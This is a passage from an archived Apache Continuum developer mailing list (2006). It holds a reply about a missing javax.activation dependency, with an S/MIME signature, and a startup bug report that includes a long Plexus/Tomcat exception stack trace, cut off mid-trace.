Re: [Patch] Missing dependency in continuum-trunk References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------ms030805020203030500000804" X-Virus-Scanned: ClamAV using ClamSMTP X-Virus-Checked: Checked by ClamAV on apache.org --------------ms030805020203030500000804 Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 7bit Jesse McConnell wrote: > hm, someone else seeing this Christian! your not the only one now! > > graham, what o/s and version of maven and jdk are you using? maven v2.0.4 on JDK v1.5 (latest MacosX). Not that it should make a difference on any platform - one of the class files references javax.activation, and javax.activation isn't a dependency in the pom. Probably caused by a modified pom.xml that wasn't checked in. Regards, Graham -- --------------ms030805020203030500000804 Content-Type: application/x-pkcs7-signature; name="smime.p7s" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="smime.p7s" Content-Description: S/MIME Cryptographic Signature MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIJNTCC AvUwggJeoAMCAQICEHPerLP+yWp/U+jCFAQ0kGwwDQYJKoZIhvcNAQEFBQAwYjELMAkGA1UE BhMCWkExJTAjBgNVBAoTHFRoYXd0ZSBDb25zdWx0aW5nIChQdHkpIEx0ZC4xLDAqBgNVBAMT I1RoYXd0ZSBQZXJzb25hbCBGcmVlbWFpbCBJc3N1aW5nIENBMB4XDTA2MDkyNzA5MDgxMloX DTA3MDkyNzA5MDgxMlowXTEQMA4GA1UEBBMHTGVnZ2V0dDEPMA0GA1UEKhMGR3JhaGFtMRcw FQYDVQQDEw5HcmFoYW0gTGVnZ2V0dDEfMB0GCSqGSIb3DQEJARYQbWluZnJpbkBzaGFycC5m bTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMJQ9lruxyjmdilORMEwQnd+ZdrC XSh5TZ/Tn/KQwFsH1ZYivHBF/lRFuy/X6AGq9EKmFI0kORoqZeatkEAZ5ocajDFxa7I8o8yk DRJUJT9Iw0eCD4omrt4Ua+xsegLvVT2Neq0txvijDLuVsheVMi4l4+g3W2C1yPHgobZ3eIno wyVyrTbPUbsSmilNpkjEEJOr0qnTEbf4FX8Qapd9Jm59vPfcqooKdiY9uDPp00nwbb1xFDtN oQikIAihFVX+EzAbhR78AGPPbDyxn9uExjfOQT46JsCaZu54VI91YLF8EgQTD8DyWe7ZiMfw jqP2Ro1ALmS+VLFOU4LNfFbzaVUCAwEAAaMtMCswGwYDVR0RBBQwEoEQbWluZnJpbkBzaGFy cC5mbTAMBgNVHRMBAf8EAjAAMA0GCSqGSIb3DQEBBQUAA4GBALHl5riB6yi4w7SD9AWr7FJq AKQ5ICk/A3xRr3l+ZHw5ZLO2uFMgT2ZKiORLAkhsqVjGhsEZgXG1BEc/Pk9B3mCYYu6nyB0n rRUzR7RVeOkOVqG8qBhZ4z/ItQAxHLk30g7S7QNbuTCeWqVVXxcaXmeBvC67s/OQICyRIFRg aKtJMIIC9TCCAl6gAwIBAgIQc96ss/7Jan9T6MIUBDSQbDANBgkqhkiG9w0BAQUFADBiMQsw CQYDVQQGEwJaQTElMCMGA1UEChMcVGhhd3RlIENvbnN1bHRpbmcgKFB0eSkgTHRkLjEsMCoG A1UEAxMjVGhhd3RlIFBlcnNvbmFsIEZyZWVtYWlsIElzc3VpbmcgQ0EwHhcNMDYwOTI3MDkw ODEyWhcNMDcwOTI3MDkwODEyWjBdMRAwDgYDVQQEEwdMZWdnZXR0MQ8wDQYDVQQqEwZHcmFo YW0xFzAVBgNVBAMTDkdyYWhhbSBMZWdnZXR0MR8wHQYJKoZIhvcNAQkBFhBtaW5mcmluQHNo YXJwLmZtMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwlD2Wu7HKOZ2KU5EwTBC d35l2sJdKHlNn9Of8pDAWwfVliK8cEX+VEW7L9foAar0QqYUjSQ5Gipl5q2QQBnmhxqMMXFr sjyjzKQNElQlP0jDR4IPiiau3hRr7Gx6Au9VPY16rS3G+KMMu5WyF5UyLiXj6DdbYLXI8eCh tnd4iejDJXKtNs9RuxKaKU2mSMQQk6vSqdMRt/gVfxBql30mbn2899yqigp2Jj24M+nTSfBt vXEUO02hCKQgCKEVVf4TMBuFHvwAY89sPLGf24TGN85BPjomwJpm7nhUj3VgsXwSBBMPwPJZ 7tmIx/COo/ZGjUAuZL5UsU5Tgs18VvNpVQIDAQABoy0wKzAbBgNVHREEFDASgRBtaW5mcmlu QHNoYXJwLmZtMAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQEFBQADgYEAseXmuIHrKLjDtIP0 BavsUmoApDkgKT8DfFGveX5kfDlks7a4UyBPZkqI5EsCSGypWMaGwRmBcbUERz8+T0HeYJhi 7qfIHSetFTNHtFV46Q5WobyoGFnjP8i1ADEcuTfSDtLtA1u5MJ5apVVfFxpeZ4G8Lruz85Ag LJEgVGBoq0kwggM/MIICqKADAgECAgENMA0GCSqGSIb3DQEBBQUAMIHRMQswCQYDVQQGEwJa QTEVMBMGA1UECBMMV2VzdGVybiBDYXBlMRIwEAYDVQQHEwlDYXBlIFRvd24xGjAYBgNVBAoT EVRoYXd0ZSBDb25zdWx0aW5nMSgwJgYDVQQLEx9DZXJ0aWZpY2F0aW9uIFNlcnZpY2VzIERp dmlzaW9uMSQwIgYDVQQDExtUaGF3dGUgUGVyc29uYWwgRnJlZW1haWwgQ0ExKzApBgkqhkiG 9w0BCQEWHHBlcnNvbmFsLWZyZWVtYWlsQHRoYXd0ZS5jb20wHhcNMDMwNzE3MDAwMDAwWhcN MTMwNzE2MjM1OTU5WjBiMQswCQYDVQQGEwJaQTElMCMGA1UEChMcVGhhd3RlIENvbnN1bHRp bmcgKFB0eSkgTHRkLjEsMCoGA1UEAxMjVGhhd3RlIFBlcnNvbmFsIEZyZWVtYWlsIElzc3Vp bmcgQ0EwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMSmPFVzVftOucqZWh5owHUEcJ3f 6f+jHuy9zfVb8hp2vX8MOmHyv1HOAdTlUAow1wJjWiyJFXCO3cnwK4Vaqj9xVsuvPAsH5/Ef kTYkKhPPK9Xzgnc9A74r/rsYPge/QIACZNenprufZdHFKlSFD0gEf6e20TxhBEAeZBlyYLf7 AgMBAAGjgZQwgZEwEgYDVR0TAQH/BAgwBgEB/wIBADBDBgNVHR8EPDA6MDigNqA0hjJodHRw Oi8vY3JsLnRoYXd0ZS5jb20vVGhhd3RlUGVyc29uYWxGcmVlbWFpbENBLmNybDALBgNVHQ8E BAMCAQYwKQYDVR0RBCIwIKQeMBwxGjAYBgNVBAMTEVByaXZhdGVMYWJlbDItMTM4MA0GCSqG SIb3DQEBBQUAA4GBAEiM0VCD6gsuzA2jZqxnD3+vrL7CF6FDlpSdf0whuPg2H6otnzYvwPQc UCCTcDz9reFhYsPZOhl+hLGZGwDFGguCdJ4lUJRix9sncVcljd2pnDmOjCBPZV+V2vf3h9bG CE6u9uo05RAaWzVNd+NWIXiC3CEZNd4ksdMdRv9dX2VPMYIDZDCCA2ACAQEwdjBiMQswCQYD VQQGEwJaQTElMCMGA1UEChMcVGhhd3RlIENvbnN1bHRpbmcgKFB0eSkgTHRkLjEsMCoGA1UE AxMjVGhhd3RlIFBlcnNvbmFsIEZyZWVtYWlsIElzc3VpbmcgQ0ECEHPerLP+yWp/U+jCFAQ0 kGwwCQYFKw4DAhoFAKCCAcMwGAYJKoZIhvcNAQkDMQsGCSqGSIb3DQEHATAcBgkqhkiG9w0B CQUxDxcNMDYxMTA5MTUyODU2WjAjBgkqhkiG9w0BCQQxFgQUUjodgS0NlVDzef4MR8uU6er7 MuUwUgYJKoZIhvcNAQkPMUUwQzAKBggqhkiG9w0DBzAOBggqhkiG9w0DAgICAIAwDQYIKoZI hvcNAwICAUAwBwYFKw4DAgcwDQYIKoZIhvcNAwICASgwgYUGCSsGAQQBgjcQBDF4MHYwYjEL MAkGA1UEBhMCWkExJTAjBgNVBAoTHFRoYXd0ZSBDb25zdWx0aW5nIChQdHkpIEx0ZC4xLDAq BgNVBAMTI1RoYXd0ZSBQZXJzb25hbCBGcmVlbWFpbCBJc3N1aW5nIENBAhBz3qyz/slqf1Po whQENJBsMIGHBgsqhkiG9w0BCRACCzF4oHYwYjELMAkGA1UEBhMCWkExJTAjBgNVBAoTHFRo YXd0ZSBDb25zdWx0aW5nIChQdHkpIEx0ZC4xLDAqBgNVBAMTI1RoYXd0ZSBQZXJzb25hbCBG cmVlbWFpbCBJc3N1aW5nIENBAhBz3qyz/slqf1PowhQENJBsMA0GCSqGSIb3DQEBAQUABIIB ACswrHTQdPq0V0ZKMTZheZEm0fa9moJi6OSwC+LDxiMrt9LDfk6rmCm5n3JcUDxBDXRhyw4m AoFhHKAIztW35k9m5ShBraNbwkv/EjmaOOrXwoc5RbDY0TQQZTVNotbbbv7kkVvjOJ0T3pZA /aON1gPvbtwRV1olsxzryZKDh40qf3CBAmfb2bx1kYUVXBgdzyYP+PNMBQaySuR+wvK9N8ou Ba5+mOiUBvUnhphaupDpk2lDEI48HNpHS4nmsBvLvMVt4L/SM2GcU+OO3P5m7IC9xKhQ7hWu ctF2mln2ARmuxYJzw8jOiBJR0lD2H0B1/pwXAJAlPQMOf1++9KTXMesAAAAAAAA= --------------ms030805020203030500000804-- From [email protected] Thu Nov 09 16:11:03 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 8035 invoked from network); 9 Nov 2006 16:10:25 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Nov 2006 16:10:25 -0000 Received: (qmail 17780 invoked by uid 500); 9 Nov 2006 16:10:35 -0000 Delivered-To: [email protected] Received: (qmail 17762 invoked by uid 500); 9 Nov 2006 16:10:35 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 17750 invoked by uid 99); 9 Nov 2006 16:10:35 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 09 Nov 2006 08:10:35 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO chandler.sharp.fm) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 09 Nov 2006 08:10:19 -0800 Received: from chandler.sharp.fm (localhost [161.129.204.104]) by chandler.sharp.fm (Postfix) with ESMTP id 3FF85E5CC5 for <[email protected]>; Thu, 9 Nov 2006 10:09:57 -0600 (CST) Received: from www.sharp.fm (unknown [161.129.204.104]) by chandler.sharp.fm (Postfix) with ESMTP id 2625DE54F5 for <[email protected]>; Thu, 9 Nov 2006 10:09:56 -0600 (CST) Received: from 161.129.204.104 (SquirrelMail authenticated user [email protected]) by www.sharp.fm with HTTP; Thu, 9 Nov 2006 18:09:57 +0200 (SAST) Message-ID: <{{EMAIL+SOCIAL_SECURITY_NUMBER}}> Date: Thu, 9 Nov 2006 18:09:57 +0200 (SAST) Subject: Continuum-trunk notifiers toasted on startup From: "Graham Leggett" <[email protected]> To: [email protected] User-Agent: SquirrelMail/1.4.8-2.el4 MIME-Version: 1.0 Content-Type: text/plain;charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Priority: 3 (Normal) Importance: Normal X-Virus-Scanned: ClamAV using ClamSMTP X-Virus-Checked: Checked by ClamAV on apache.org Hi all, I am getting the following exception on continuum trunk webapp startup, which prevents it working: java.lang.ClassNotFoundException: org.codehaus.plexus.mailsender.javamail.JavamailMailSender This exception seems to be the last exception in the very long chain of exceptions below: Any ideas? 2006-11-09 18:05:01,027 [main] INFO PlexusContainer - Loading on start [role,roleHint]: [org.codehaus.plexus.taskqueue.execution.TaskQueueExecutor,build-project] ----------------------------------------------------- this realm = plexus.core Number of imports: 0 ----------------------------------------------------- 2006-11-09 18:05:01,504 [main] ERROR [/continuum] - Exception sending context initialized event to listener instance of class org.codehaus.plexus.xwork.PlexusLifecycleListener java.lang.RuntimeException: org.codehaus.plexus.PlexusContainerException: Error initializaing container in [email protected]. at org.codehaus.plexus.xwork.PlexusLifecycleListener.contextInitialized(PlexusLifecycleListener.java:65) at org.apache.catalina.core.StandardContext.listenerStart(StandardContext.java:3763) at org.apache.catalina.core.StandardContext.start(StandardContext.java:4211) at org.apache.catalina.core.ContainerBase.addChildInternal(ContainerBase.java:759) at org.apache.catalina.core.ContainerBase.addChild(ContainerBase.java:739) at org.apache.catalina.core.StandardHost.addChild(StandardHost.java:524) at org.apache.catalina.startup.HostConfig.deployDescriptor(HostConfig.java:608) at org.apache.catalina.startup.HostConfig.deployDescriptors(HostConfig.java:535) at org.apache.catalina.startup.HostConfig.deployApps(HostConfig.java:470) at org.apache.catalina.startup.HostConfig.start(HostConfig.java:1122) at org.apache.catalina.startup.HostConfig.lifecycleEvent(HostConfig.java:310) at org.apache.catalina.util.LifecycleSupport.fireLifecycleEvent(LifecycleSupport.java:119) at org.apache.catalina.core.ContainerBase.start(ContainerBase.java:1021) at org.apache.catalina.core.StandardHost.start(StandardHost.java:718) at org.apache.catalina.core.ContainerBase.start(ContainerBase.java:1013) at org.apache.catalina.core.StandardEngine.start(StandardEngine.java:442) at org.apache.catalina.core.StandardService.start(StandardService.java:450) at org.apache.catalina.core.StandardServer.start(StandardServer.java:709) at org.apache.catalina.startup.Catalina.start(Catalina.java:551) at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39) at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25) at java.lang.reflect.Method.invoke(Method.java:585) at org.apache.catalina.startup.Bootstrap.start(Bootstrap.java:294) at org.apache.catalina.startup.Bootstrap.main(Bootstrap.java:432) Caused by: org.codehaus.plexus.PlexusContainerException: Error initializaing container in [email protected]. at org.codehaus.plexus.DefaultPlexusContainer.initializePhases(DefaultPlexusContainer.java:614) at org.codehaus.plexus.DefaultPlexusContainer.initialize(DefaultPlexusContainer.java:564) at org.codehaus.plexus.DefaultPlexusContainer.<init>(DefaultPlexusContainer.java:235) at org.codehaus.plexus.DefaultPlexusContainer.<init>(DefaultPlexusContainer.java:197) at org.codehaus.plexus.xwork.PlexusLifecycleListener.contextInitialized(PlexusLifecycleListener.java:59) ... 24 more Caused by: org.codehaus.plexus.container.initialization.ContainerInitializationException: Error looking up load-on-start component. at org.codehaus.plexus.container.initialization.StartLoadOnStartComponentsPhase.execute(StartLoadOnStartComponentsPhase.java:57) at org.codehaus.plexus.DefaultPlexusContainer.initializePhases(DefaultPlexusContainer.java:610) ... 28 more Caused by: org.codehaus.plexus.component.repository.exception.ComponentLookupException: Unable to lookup component 'org.codehaus.plexus.taskqueue.execution.TaskQueueExecutorbuild-project', it could not be started at org.codehaus.plexus.DefaultComponentLookupManager.lookup(DefaultComponentLookupManager.java:86) at org.codehaus.plexus.DefaultComponentLookupManager.lookup(DefaultComponentLookupManager.java:191) at org.codehaus.plexus.DefaultPlexusContainer.lookup(DefaultPlexusContainer.java:265) at org.codehaus.plexus.container.initialization.StartLoadOnStartComponentsPhase.execute(StartLoadOnStartComponentsPhase.java:52) ... 29 more Caused by: org.codehaus.plexus.component.repository.exception.ComponentLifecycleException: Error starting component at org.codehaus.plexus.component.manager.AbstractComponentManager.startComponentLifecycle(AbstractComponentManager.java:114) at org.codehaus.plexus.component.manager.AbstractComponentManager.createComponentInstance(AbstractComponentManager.java:100) at org.codehaus.plexus.component.manager.ClassicSingletonComponentManager.getComponent(ClassicSingletonComponentManager.java:92) at org.codehaus.plexus.DefaultComponentLookupManager.lookup(DefaultComponentLookupManager.java:77) ... 32 more Caused by: org.codehaus.plexus.personality.plexus.lifecycle.phase.PhaseExecutionException: Error composing component at org.codehaus.plexus.personality.plexus.lifecycle.phase.CompositionPhase.execute(CompositionPhase.java:35) at org.codehaus.plexus.lifecycle.AbstractLifecycleHandler.start(AbstractLifecycleHandler.java:102) at org.codehaus.plexus.component.manager.AbstractComponentManager.startComponentLifecycle(AbstractComponentManager.java:110) ... 35 more Caused by: org.codehaus.plexus.component.composition.CompositionException: Composition failed of field null in object of type org.codehaus.plexus.taskqueue.execution.ThreadedTaskQueueExecutor because the requirement ComponentRequirement{role='org.codehaus.plexus.taskqueue.execution.TaskExecutor', roleHint='build-project', fieldName='null'} was missing at org.codehaus.plexus.component.composition.CompositionUtils.findRequirement(CompositionUtils.java:100) at org.codehaus.plexus.component.composition.FieldComponentComposer.assignRequirementToField(FieldComponentComposer.java:70) at org.codehaus.plexus.component.composition.FieldComponentComposer.assignRequirement(FieldComponentComposer.java:61) at org.codehaus.plexus.component.composition.AbstractComponentComposer.assembleComponent(AbstractComponentComposer.java:103) at org.codehaus.plexus.component.composition.DefaultComponentComposerManager.assembleComponent(DefaultComponentComposerManager.java:70) at org.codehaus.plexus.personality.plexus.lifecycle.phase.CompositionPhase.execute(CompositionPhase.java:31) ... 37 more Caused by: org.codehaus.plexus.component.repository.exception.ComponentLookupException: Unable to lookup component 'org.codehaus.plexus.taskqueue.execution.TaskExecutorbuild-project', it could not be started at org.codehaus.plexus.DefaultComponentLookupManager.lookup(DefaultComponentLookupManager.java:86) at org.codehaus.plexus.DefaultPlexusContainer.lookup(DefaultPlexusContainer.java:247) at org.codehaus.plexus.component.composition.CompositionUtils.findRequirement(CompositionUtils.java:87) ... 42 more Caused by: org.codehaus.plexus.component.repository.exception.ComponentLifecycleException: Error starting component at org.codehaus.plexus.component.manager.AbstractComponentManager.startComponentLifecycle(AbstractComponentManager.java:114) at org.codehaus.plexus.component.manager.AbstractComponentManager.createComponentInstance(AbstractComponentManager.java:100) at org.codehaus.plexus.component.manager.ClassicSingletonComponentManager.getComponent(ClassicSingletonComponentManager.java:92) at org.codehaus.plexus.DefaultComponentLookupManager.lookup(DefaultComponentLookupManager.java:77) ... 44 more Caused by: org.codehaus.plexus.personality.plexus.lifecycle.phase.PhaseExecutionException: Error composing component at org.codehaus.plexus.personality.plexus.lifecycle.phase.CompositionPhase.execute(CompositionPhase.java:35) at org.codehaus.plexus.lifecycle.AbstractLifecycleHandler.start(AbstractLifecycleHandler.java:102) at org.codehaus.plexus.component.manager.AbstractComponentManager.startComponentLifecycle(AbstractComponentManager.java:110) ... 47 more Caused by: org.codehaus.plexus.component.composition.CompositionException: Composition failed of field null in object of type org.apache.maven.continuum.buildcontroller.BuildProjectTaskExecutor because the requirement ComponentRequirement{role='org.apache.maven.continuum.buildcontroller.BuildController', roleHint='null', fieldName='null'} was missing at org.codehaus.plexus.component.composition.CompositionUtils.findRequirement(CompositionUtils.java:100) at org.codehaus.plexus.component.composition.FieldComponentComposer.assignRequirementToField(FieldComponentComposer.java:70) at org.codehaus.plexus.component.composition.FieldComponentComposer.assignRequirement(FieldComponentComposer.java:61) at org.codehaus.plexus.component.composition.AbstractComponentComposer.assembleComponent(AbstractComponentComposer.java:103) at org.codehaus.plexus.component.composition.DefaultComponentComposerManager.assembleComponent(DefaultComponentComposerManager.java:70) at org.codehaus.plexus.personality.plexus.lifecycle.phase.CompositionPhase.execute(CompositionPhase.java:31) ... 49 more Caused by: org.codehaus.plexus.component.repository.exception.ComponentLookupException: Unable to lookup component 'org.apache.maven.continuum.buildcontroller.BuildController', it could not be started at org.codehaus.plexus.DefaultComponentLookupManager.lookup(DefaultComponentLookupManager.java:86) at org.codehaus.plexus.DefaultPlexusContainer.lookup(DefaultPlexusContainer.java:247) at org.codehaus.plexus.component.composition.CompositionUtils.findRequirement(CompositionUtils.java:87) ... 54 more Caused by: org.codehaus.plexus.component.repository.exception.ComponentLifecycleException: Error starting component at org.codehaus.plexus.component.manager.AbstractComponentManager.startComponentLifecycle(AbstractComponentManager.java:114) at org.codehaus.plexus.component.manager.AbstractComponentManager.createComponentInstance(AbstractComponentManager.java:100) at org.codehaus.plexus.component.manager.ClassicSingletonComponentManager.getComponent(ClassicSingletonComponentManager.java:92) at org.codehaus.plexus.DefaultComponentLookupManager.lookup(DefaultComponentLookupManager.java:77) ... 56 more Caused by: org.codehaus.plexus.personality.plexus.lifecycle.phase.PhaseExecutionException: Error composing component at org.codehaus.plexus.personality.plexus.lifecycle.phase.CompositionPhase.execute(CompositionPhase.java:35) at org.codehaus.plexus.lifecycle.AbstractLifecycleHandler.start(AbstractLifecycleHandler.java:102) at org.codehaus.plexus.component.manager.AbstractComponentManager.startComponentLifecycle(AbstractComponentManager.java:110) ... 59 more Caused by: org.codehaus.plexus.component.composition.CompositionException: Composition failed of field null in object of type org.apache.maven.continuum.buildcontroller.DefaultBuildController because the requirement ComponentRequirement{role='org.apache.maven.continuum.notification.ContinuumNotificationDispatcher', roleHint='null', fieldName='null'} was missing at org.codehaus.plexus.component.composition.CompositionUtils.findRequirement(CompositionUtils.java:100) at org.codehaus.plexus.component.composition.FieldComponentComposer.assignRequirementToField(FieldComponentComposer.java:70) at org.codehaus.plexus.component.composition.FieldComponentComposer.assignRequirement(FieldComponentComposer.java:61) at org.codehaus.plexus.component.composition.AbstractComponentComposer.assembleComponent(AbstractComponentComposer.java:103) at org.codehaus.plexus.component.composition.DefaultComponentComposerManager.assembleComponent(DefaultComponentComposerManager.java:70) at org.codehaus.plexus.personality.plexus.lifecycle.phase.CompositionPhase.execute(CompositionPhase.java:31) ... 61 more Caused by: org.codehaus.plexus.component.repository.exception.ComponentLookupException: Unable to lookup component 'org.apache.maven.continuum.notification.ContinuumNotificationDispatcher', it could not be started at org.codehaus.plexus.DefaultComponentLookupManager.lookup(DefaultComponentLookupManager.java:86) at org.codehaus.plexus.DefaultPlexusContainer.lookup(DefaultPlexusContainer.java:247) at org.codehaus.plexus.component.composition.CompositionUtils.findRequirement(CompositionUtils.java:87) ... 66 more Caused by: org.codehaus.plexus.component.repository.exception.ComponentLifecycleException: Error starting component at org.codehaus.plexus.component.manager.AbstractComponentManager.startComponentLifecycle(AbstractComponentManager.java:114) at org.codehaus.plexus.component.manager.AbstractComponentManager.createComponentInstance(AbstractComponentManager.java:100) at org.codehaus.plexus.component.manager.ClassicSingletonComponentManager.getComponent(ClassicSingletonComponentManager.java:92) at org.codehaus.plexus.DefaultComponentLookupManager.lookup(DefaultComponentLookupManager.java:77) ... 68 more Caused by: org.codehaus.plexus.personality.plexus.lifecycle.phase.PhaseExecutionException: Error composing component at org.codehaus.plexus.personality.plexus.lifecycle.phase.CompositionPhase.execute(CompositionPhase.java:35) at org.codehaus.plexus.lifecycle.AbstractLifecycleHandler.start(AbstractLifecycleHandler.java:102) at org.codehaus.plexus.component.manager.AbstractComponentManager.startComponentLifecycle(AbstractComponentManager.java:110) ... 71 more Caused by: org.codehaus.plexus.component.composition.CompositionException: Composition failed of field null in object of type org.apache.maven.continuum.notification.DefaultContinuumNotificationDispatcher because the requirement ComponentRequirement{role='org.codehaus.plexus.notification.notifier.manager.NotifierManager', roleHint='null', fieldName='null'} was missing at org.codehaus.plexus.component.composition.CompositionUtils.findRequirement(CompositionUtils.java:100) at org.codehaus.plexus.component.composition.FieldComponentComposer.assignRequirementToField(FieldComponentComposer.java:70) at org.codehaus.plexus.component.composition.FieldComponentComposer.assignRequirement(FieldComponentComposer.java:61) at org.codehaus.plexus.component.composition.AbstractComponentComposer.assembleComponent(AbstractComponentComposer.java:103) at org.codehaus.plexus.component.composition.DefaultComponentComposerManager.assembleComponent(DefaultComponentComposerManager.java:70) at org.codehaus.plexus.personality.plexus.lifecycle.phase.CompositionPhase.execute(CompositionPhase.java:31) ... 73 more Caused by: org.codehaus.plexus.component.repository.exception.ComponentLookupException: Unable to lookup component 'org.codehaus.plexus.notification.notifier.manager.NotifierManager', it could not be started at org.codehaus.plexus.DefaultComponentLookupManager.lookup(DefaultComponentLookupManager.java:86) at org.codehaus.plexus.DefaultPlexusContainer.lookup(DefaultPlexusContainer.java:247) at org.codehaus.plexus.component.composition.CompositionUtils.findRequirement(CompositionUtils.java:87) ... 78 more Caused by: org.codehaus.plexus.component.repository.exception.ComponentLifecycleException: Error starting component at org.codehaus.plexus.component.manager.AbstractComponentManager.startComponentLifecycle(AbstractComponentManager.java:114) at org.codehaus.plexus.component.manager.AbstractComponentManager.createComponentInstance(AbstractComponentManager.java:100) at org.codehaus.plexus.component.manager.ClassicSingletonComponentManager.getComponent(ClassicSingletonComponentManager.java:92) at org.codehaus.plexus.DefaultComponentLookupManager.lookup(DefaultComponentLookupManager.java:77) ... 80 more Caused by: org.codehaus.plexus.personality.plexus.lifecycle.phase.PhaseExecutionException: Error composing component at org.codehaus.plexus.personality.plexus.lifecycle.phase.CompositionPhase.execute(CompositionPhase.java:35) at org.codehaus.plexus.lifecycle.AbstractLifecycleHandler.start(AbstractLifecycleHandler.java:102) at org.codehaus.plexus.component.manager.AbstractComponentManager.startComponentLifecycle(AbstractComponentManager.java:110) ... 83 more Caused by: org.codehaus.plexus.component.composition.CompositionException: Composition failed of field notifiers in object of type org.codehaus.plexus.notification.notifier.manager.DefaultNotifierManager because the requirement ComponentRequirement{role='org.codehaus.plexus.notification.notifier.Notifier', roleHint='null', fieldName='notifiers'} was missing at org.codehaus.plexus.component.composition.CompositionUtils.findRequirement(CompositionUtils.java:100) at org.codehaus.plexus.component.composition.FieldComponentComposer.assignRequirementToField(FieldComponentComposer.java:70) at org.codehaus.plexus.component.composition.FieldComponentComposer.assignRequirement(FieldComponentComposer.java:61) at org.codehaus.plexus.component.composition.AbstractComponentComposer.assembleComponent(AbstractComponentComposer.java:103) at org.codehaus.plexus.component.composition.DefaultComponentComposerManager.assembleComponent(DefaultComponentComposerManager.java:70) at org.codehaus.plexus.personality.plexus.lifecycle.phase.CompositionPhase.execute(CompositionPhase.java:31) ... 85 more Caused by: org.codehaus.plexus.component.repository.exception.ComponentLookupException: Unable to lookup component 'org.codehaus.plexus.notification.notifier.Notifiermail', it could not be started at org.codehaus.plexus.DefaultComponentLookupManager.lookup(DefaultComponentLookupManager.java:86) at org.codehaus.plexus.DefaultComponentLookupManager.lookup(DefaultComponentLookupManager.java:191) at org.codehaus.plexus.DefaultComponentLookupManager.lookupMap(DefaultComponentLookupManager.java:140) at org.codehaus.plexus.DefaultPlexusContainer.lookupMap(DefaultPlexusContainer.java:253) at org.codehaus.plexus.component.composition.CompositionUtils.findRequirement(CompositionUtils.java:67) ... 90 more Caused by: org.codehaus.plexus.component.repository.exception.ComponentLifecycleException: Error starting component at org.codehaus.plexus.component.manager.AbstractComponentManager.startComponentLifecycle(AbstractComponentManager.java:114) at org.codehaus.plexus.component.manager.AbstractComponentManager.createComponentInstance(AbstractComponentManager.java:100) at org.codehaus.plexus.component.manager.ClassicSingletonComponentManager.getComponent(ClassicSingletonComponentManager.java:92) at org.codehaus.plexus.DefaultComponentLookupManager.lookup(DefaultComponentLookupManager.java:77) ... 94 more Caused by: org.codehaus.plexus.personality.plexus.lifecycle.phase.PhaseExecutionException: Error composing component at org.codehaus.plexus.personality.plexus.lifecycle.phase.CompositionPhase.execute(CompositionPhase.java:35) at org.codehaus.plexus.lifecycle.AbstractLifecycleHandler.start(AbstractLifecycleHandler.java:102) at org.codehaus.plexus.component.manager.AbstractComponentManager.startComponentLifecycle(AbstractComponentManager.java:110) ... 97 more Caused by: org.codehaus.plexus.component.composition.CompositionException: Composition failed of field null in object of type org.apache.maven.continuum.notification.mail.MailContinuumNotifier because the requirement ComponentRequirement{role='org.codehaus.plexus.mailsender.MailSender', roleHint='null', fieldName='null'} was missing at org.codehaus.plexus.component.composition.CompositionUtils.findRequirement(CompositionUtils.java:100) at org.codehaus.plexus.component.composition.FieldComponentComposer.assignRequirementToField(FieldComponentComposer.java:70) at org.codehaus.plexus.component.composition.FieldComponentComposer.assignRequirement(FieldComponentComposer.java:61) at org.codehaus.plexus.component.composition.AbstractComponentComposer.assembleComponent(AbstractComponentComposer.java:103) at org.codehaus.plexus.component.composition.DefaultComponentComposerManager.assembleComponent(DefaultComponentComposerManager.java:70) at org.codehaus.plexus.personality.plexus.lifecycle.phase.CompositionPhase.execute(CompositionPhase.java:31) ... 99 more Caused by: org.codehaus.plexus.component.repository.exception.ComponentLookupException: Unable to lookup component 'org.codehaus.plexus.mailsender.MailSender', it could not be created at org.codehaus.plexus.DefaultComponentLookupManager.lookup(DefaultComponentLookupManager.java:81) at org.codehaus.plexus.DefaultPlexusContainer.lookup(DefaultPlexusContainer.java:247) at org.codehaus.plexus.component.composition.CompositionUtils.findRequirement(CompositionUtils.java:87) ... 104 more Caused by: org.codehaus.plexus.component.factory.ComponentInstantiationException: Could not instanciate component: role: 'org.codehaus.plexus.mailsender.MailSender', implementation: 'org.codehaus.plexus.mailsender.javamail.JavamailMailSender' at org.codehaus.plexus.component.factory.java.JavaComponentFactory.makeException(JavaComponentFactory.java:77) at org.codehaus.plexus.component.factory.java.JavaComponentFactory.newInstance(JavaComponentFactory.java:54) at org.codehaus.plexus.component.manager.AbstractComponentManager.createComponentInstance(AbstractComponentManager.java:187) at org.codehaus.plexus.component.manager.AbstractComponentManager.createComponentInstance(AbstractComponentManager.java:98) at org.codehaus.plexus.component.manager.ClassicSingletonComponentManager.getComponent(ClassicSingletonComponentManager.java:92) at org.codehaus.plexus.DefaultComponentLookupManager.lookup(DefaultComponentLookupManager.java:77) ... 106 more Caused by: 